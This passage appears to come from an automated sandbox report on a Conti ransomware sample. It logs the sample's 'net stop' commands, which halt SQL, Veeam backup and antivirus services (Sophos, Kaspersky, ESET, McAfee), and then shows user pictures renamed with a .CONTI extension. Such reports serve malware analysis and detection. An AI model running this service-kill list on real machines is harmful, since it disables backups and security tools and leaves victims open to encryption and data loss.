net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLBrowser /y

C:\Windows\SysWOW64\net.exe

net stop SQLBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net.exe

net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSafeOLRService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLWriter /y

C:\Windows\SysWOW64\net.exe

net stop SQLWriter /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLWriter /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBackupSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCloudSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploySvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamMountSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamRESTSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop W3Svc /y

C:\Windows\SysWOW64\net.exe

net stop W3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop W3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop WRSVC /y

C:\Windows\SysWOW64\net.exe

net stop WRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop WRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop swi_update /y

C:\Windows\SysWOW64\net.exe

net stop swi_update /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop swi_update /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop msftesql$PROD /y

C:\Windows\SysWOW64\net.exe

net stop msftesql$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop msftesql$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net.exe

net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetMsmqActivator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EhttpSrv /y

C:\Windows\SysWOW64\net.exe

net stop EhttpSrv /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EhttpSrv /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ekrn /y

C:\Windows\SysWOW64\net.exe

net stop ekrn /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ekrn /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ESHASRV /y

C:\Windows\SysWOW64\net.exe

net stop ESHASRV /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ESHASRV /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AVP /y

C:\Windows\SysWOW64\net.exe

net stop AVP /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AVP /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop klnagent /y

C:\Windows\SysWOW64\net.exe

net stop klnagent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop klnagent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfefire /y

C:\Windows\SysWOW64\net.exe

net stop mfefire /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfefire /y

Network

N/A

Files

memory/1204-54-0x0000000074E31000-0x0000000074E33000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-06 03:51

Reported

2022-03-06 03:54

Platform

win10v2004-en-20220113

Max time kernel

133s

Max time network

137s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe"

Signatures

Conti Ransomware

ransomware conti

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\SuspendStart.raw => C:\Users\Admin\Pictures\SuspendStart.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\SyncPing.raw => C:\Users\Admin\Pictures\SyncPing.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\SplitConnect.raw => C:\Users\Admin\Pictures\SplitConnect.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\UnprotectConfirm.raw => C:\Users\Admin\Pictures\UnprotectConfirm.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\UnlockRevoke.raw => C:\Users\Admin\Pictures\UnlockRevoke.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\ApproveNew.tiff C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\ApproveNew.tiff => C:\Users\Admin\Pictures\ApproveNew.tiff.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\GetSuspend.raw => C:\Users\Admin\Pictures\GetSuspend.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\ResolvePush.raw => C:\Users\Admin\Pictures\ResolvePush.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\CompleteRead.png => C:\Users\Admin\Pictures\CompleteRead.png.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\GroupUninstall.crw => C:\Users\Admin\Pictures\GroupUninstall.crw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\RestartApprove.crw => C:\Users\Admin\Pictures\RestartApprove.crw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
